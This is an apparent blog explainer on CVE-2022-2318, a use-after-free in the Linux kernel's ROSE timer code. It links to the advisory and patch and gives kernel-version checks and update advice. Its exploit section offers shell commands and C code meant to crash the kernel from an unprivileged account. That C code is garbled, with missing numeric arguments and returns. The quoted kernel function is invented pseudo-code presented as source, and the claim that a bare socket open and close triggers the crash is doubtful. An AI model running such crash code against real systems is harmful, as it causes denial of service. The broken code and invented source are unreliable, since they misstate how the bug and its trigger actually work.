In the world of operating systems, stability and security go hand-in-hand. But sometimes, a small bug lurking deep within code can have outsized impacts—especially in the Linux kernel, the beating heart of most servers and millions of devices. One such security flaw is CVE-2022-2318, a vulnerability that lets attackers crash the Linux kernel without any special privileges.

This post will break down CVE-2022-2318 for everyone, from Linux beginners to seasoned security pros. We’ll look at the basic vulnerability, how it works, how to reproduce or exploit it, and how to stay protected.

What is CVE-2022-2318?

CVE-2022-2318 is a use-after-free vulnerability in the Linux kernel—specifically in the timer handler code of the ROSE protocol module (net/rose/rose_timer.c). The ROSE protocol is used for amateur radio networking, but the flaw isn’t limited to radio fans: any system with this module loaded is at risk.

Impact: Kernel crash (Denial of Service)

- Affected code: net/rose/rose_timer.c

How Does the Vulnerability Happen?

The bug arises due to improper handling of memory in timer callbacks. When a timer expires, it uses a function to operate on a ROSE neighbor object (rose_neigh). But due to a race condition, one thread can *free* the object while another is still accessing it—hence a "use-after-free." This means code operates on memory that might now belong to something else, or is invalid. The result? A system crash, or in rare cases, more serious compromise.

The crux of the bug is in rose_ttimer_expiry() and other timer functions that touch a rose_neigh object that might already have been freed by another process/thread.

Here’s a high-level snippet to illustrate what goes wrong (from net/rose/rose_timer.c)

// Called when timer expires
static void rose_ttimer_expiry(struct timer_list *t) {
    struct rose_neigh *neigh = from_timer(neigh, t, ttimer);

    // ... do something with neigh ...

    rose_remove_neigh(neigh); // <-- potential to free neigh

    // But neigh might still be accessed below after free!
    do_something(neigh);
}

The bug happens because rose_remove_neigh(neigh); can free the neigh object, but the function might still use it after it’s been freed. If the memory at neigh has already been reused or unmapped, the kernel will panic—causing a full system crash.

CVE entry:

https://nvd.nist.gov/vuln/detail/CVE-2022-2318

Kernel Patch:

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7fbc752c4006b2029c812ed862fc07e5089ad3b7

Bug Reporter (Syzkaller):

https://syzkaller.appspot.com/bug?extid=e723c2f87dfa04c3e9d5

How is CVE-2022-2318 Exploited?

This bug was originally discovered by Syzkaller, Google’s Linux kernel fuzzing toolkit. What matters for average users: Any local user can trigger this bug if the ROSE protocol is available (can be loaded via modprobe rose).

Below is a pseudo-code (shell + minimal C) replication

# Make sure the 'rose' kernel module is loaded
sudo modprobe rose

# Now, you can exploit via socket syscalls from any unprivileged user:
gcc -o crash_rose crash_rose.c
./crash_rose

And here’s a simplified C code that opens a ROSE socket and closes it rapidly, which can trigger timers and expose the use-after-free:

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <linux/rose.h>
#include <unistd.h>

int main() {
    int fd = socket(AF_ROSE, SOCK_DGRAM, );
    if (fd < ) {
        perror("socket");
        return 1;
    }
    // Do nothing or quickly close and repeat in a loop to stress test
    close(fd);
    return ;
}

Real exploits might create hundreds of sockets, manipulating timers and removing neighbors in a crafted sequence, but for most distributions even this minimal code can set the stage for a crash.

You are if

- Your kernel version is older than 5.15.51 or doesn’t have the patch listed above.

How to Check

uname -r # Check your kernel version
lsmod | grep rose # See if 'rose' is loaded
modinfo rose # See if it's present

Update your kernel:

Install security updates from your Linux distribution. Mainline kernel versions 5.15.51 and 5.10.129 (and newer) are patched.

Conclusion

CVE-2022-2318 teaches us two things:

Even obscure protocols can expose major bugs in a system.

- Use-after-free vulnerabilities are dangerous and often exploitable, especially in critical code like the Linux kernel.

Update your systems, check what modules you’re running, and remember: When it comes to security, it’s better to shut down what you don’t use.

- Upstream Kernel Commit - The Patch
- NVD - CVE Report
- Syzkaller Bug

For further reading on use-after-free bugs, see the Linux Kernel Documentation on Timers.

Timeline

Published on: 07/06/2022 19:15:00 UTC
Last modified on: 07/27/2022 11:15:00 UTC